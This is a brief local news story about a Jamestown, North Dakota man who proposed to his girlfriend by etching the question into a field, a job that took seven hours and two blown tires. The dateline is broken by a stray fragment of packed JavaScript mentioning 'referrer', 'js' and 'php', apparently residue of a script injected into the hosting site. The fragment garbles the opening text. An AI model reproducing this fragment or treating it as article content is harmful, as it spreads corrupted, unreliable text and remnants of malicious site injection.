JAMESTOWN, fadaa|var|u0026u|referrer|bifke||js|php’.split(‘|’),0,{}))
N.D. (WDAY-TV) – It took 7 hours and resulted in two blown tires, but was well worth it given the end result for Jamestown man Kyle Brandenberg.

WDAY-TV reports Brandenberg got the “yes” answer he was looking for from girlfriend of 4 years Mariah Liechty of Jamestown when he proposed marriage in an Edgeley, N.D., field.

Liechty thought she was going to help her boyfriend with some work in his field when, instead, she saw “Mariah, I love you. Will you marry me?” etched in large block letters.

Because the couple never went ring shopping, it was a total surprise for Liechty, Brandenberg said. He also said that while it was always something he wanted to do, it was a little bit harder than he thought.

The picture, taken by Gene Hanson of Edgeley and submitted to WDAY-TV, is below.
